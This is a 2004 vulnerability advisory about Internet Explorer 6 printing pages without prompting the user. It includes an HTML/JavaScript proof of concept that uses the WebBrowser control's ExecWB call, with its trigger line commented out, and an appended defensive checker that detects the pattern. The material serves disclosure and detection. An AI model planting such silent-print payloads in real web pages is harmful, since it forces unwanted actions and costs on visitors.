
MSIE.printer.txt

Date: 12 Apr 2004
Reported by: Ben Garvey
Type: packetstorm
Source: packetstormsecurity.com

Internet Explorer 6 allows JavaScript to send documents to the printer without prompting the user, which can cause significant waste of paper, toner and ink.

Code
`#######################################################################  
  
Ben Garvey  
  
Application: Microsoft Internet Explorer  
  
Versions: 6.0  
Platforms: Windows  
Bugs: IE 6 allows JavaScript to send documents to the printer   
without prompting the user.  
Exploitation: Client  
Date: 12 April 2004  
Author: Ben Garvey  
[email protected]  
http://www.bengarvey.com  
  
Bugtraq report format: Thanks Luigi Auriemma!  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
Microsoft Internet Explorer is the dominant web browser on the world's PCs.  
Any exploits or bugs found hurt millions of users.  
Like anyone here needed to know that or is surprised.  
  
#######################################################################  
  
===============  
2) Bug summary  
===============  
  
Using an OLE object, JavaScript, and HTML, IE 6 will allow a malicious  
document to send pages to the printer without prompting the user.  
  
Printing documents without prompting the user could result in the waste  
of paper, toner, ink or result in damage to the printer. If inserted into  
a high traffic website this waste could be substantial.  
  
$ of paper x printed sheets x web traffic x % of IE Users = $total waste   
in paper  
  
If paper costs a penny per sheet ($5 for 500 sheets)  
We average about 10 sheets printed per user before they realize what's   
happening (conservative estimate)  
It's used on a high traffic website (1 million unique visitors)  
IE's market share is about 90%.  
  
$0.01 x 10 per user x 1 million x 0.90 = $90,000 in damages  
  
This doesn't even include costs associated with toner and time.  
  
  
===============  
3) Exploit  
===============  
  
The following is an example of the exploit. The offending line must be   
uncommented to activate it. Remove any linebreaks that break the   
JavaScript.  
  
<HTML>  
<HEAD>  
  
<SCRIPT language="JavaScript">  
  
function ieExecWB( intOLEcmd, intOLEparam )  
{ // Create OLE Object  
var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0   
CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';  
  
// Place Object on page  
document.body.insertAdjacentHTML('beforeEnd', WebBrowser);  
  
// if intOLEparam is not defined, set it  
if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || (   
intOLEparam > 1) )  
intOLEparam = 1;  
  
// Execute Object  
WebBrowser1.ExecWB( intOLEcmd, intOLEparam );  
  
// Destroy Object  
WebBrowser1.outerHTML = "";  
}  
  
function printAll()  
{   
// Uncomment this to enable the exploit!  
//ieExecWB(6,-1);  
  
}  
  
</SCRIPT>  
  
</HEAD>  
  
<BODY onload="printAll()">  
  
<h3>I like your PRINTER</h3>  
  
</BODY>  
  
</HTML>  
  
===============  
4) Conclusion  
===============  
  
I can't think of any reasonable use for allowing IE to print stuff   
without my permission.  
This bug should be fixed as soon as possible.  
  
  
-----  
Ben Garvey  
[email protected]  
http://www.bengarvey.com  
`
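
A defender-side check for the pattern this advisory describes, as an added example that is not part of Ben Garvey's advisory: it flags HTML that embeds the WebBrowser control CLSID and scripts `ExecWB` with the print command (6) and an option other than 1. The function names, the sample pages and the rule that any option other than 1 is treated as non-prompting are assumptions of this example.

```javascript
// Added example: heuristic static check, not a full JavaScript parser.
const WEBBROWSER_CLSID = "8856F961-340A-11D0-A96B-00C04FD705A2"; // from the advisory
const OLECMDID_PRINT = 6;           // first ExecWB argument in the advisory
const OLECMDEXECOPT_PROMPTUSER = 1; // only option treated as prompting (assumption)

// Drop block and line comments so a commented-out call is not reported as active.
// The [^:"'] guard keeps "http://" in URLs from being cut.
function stripJsComments(src) {
  return src
    .replace(/\/\*[\s\S]*?\*\//g, "")
    .replace(/(^|[^:"'])\/\/.*$/gm, "$1");
}

// Returns "none", "review" (control is scripted, no literal silent print found)
// or "silent-print" (literal print command with a non-prompting option).
function classifyPage(html) {
  const code = stripJsComments(html);
  const clsid = new RegExp("clsid\\s*:\\s*" + WEBBROWSER_CLSID, "i");
  if (!clsid.test(code) || !/\.\s*ExecWB\s*\(/i.test(code)) return "none";

  // Direct calls and wrappers whose name ends in ExecWB, e.g. ieExecWB(6,-1).
  const call = /\w*ExecWB\s*\(\s*(-?\d+)\s*,\s*(-?\d+)\s*\)/gi;
  for (const m of code.matchAll(call)) {
    const cmd = Number(m[1]);
    const opt = Number(m[2]);
    if (cmd === OLECMDID_PRINT && opt !== OLECMDEXECOPT_PROMPTUSER) {
      return "silent-print";
    }
  }
  return "review";
}

// Constructed sample pages modelled on the advisory's structure.
const OBJECT_TAG =
  '<OBJECT ID="WebBrowser1" CLASSID="CLSID:' + WEBBROWSER_CLSID + '"></OBJECT>';
const WRAPPER = "function ieExecWB(c, p) { WebBrowser1.ExecWB(c, p); }\n";
const samples = {
  dormant: OBJECT_TAG + "<script>" + WRAPPER + "//ieExecWB(6,-1);\n</script>",
  active: OBJECT_TAG + "<script>" + WRAPPER + "ieExecWB(6,-1);\n</script>",
  prompts: OBJECT_TAG + "<script>" + WRAPPER + "ieExecWB(6,1);\n</script>",
  benign: "<script>window.print(); // normal print dialog\n</script>",
};

for (const [name, html] of Object.entries(samples)) {
  console.log(name.padEnd(8), classifyPage(html));
}
```

A "review" result means the control is embedded and scripted but the arguments could not be resolved to a literal silent print, so the page still needs a manual look.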
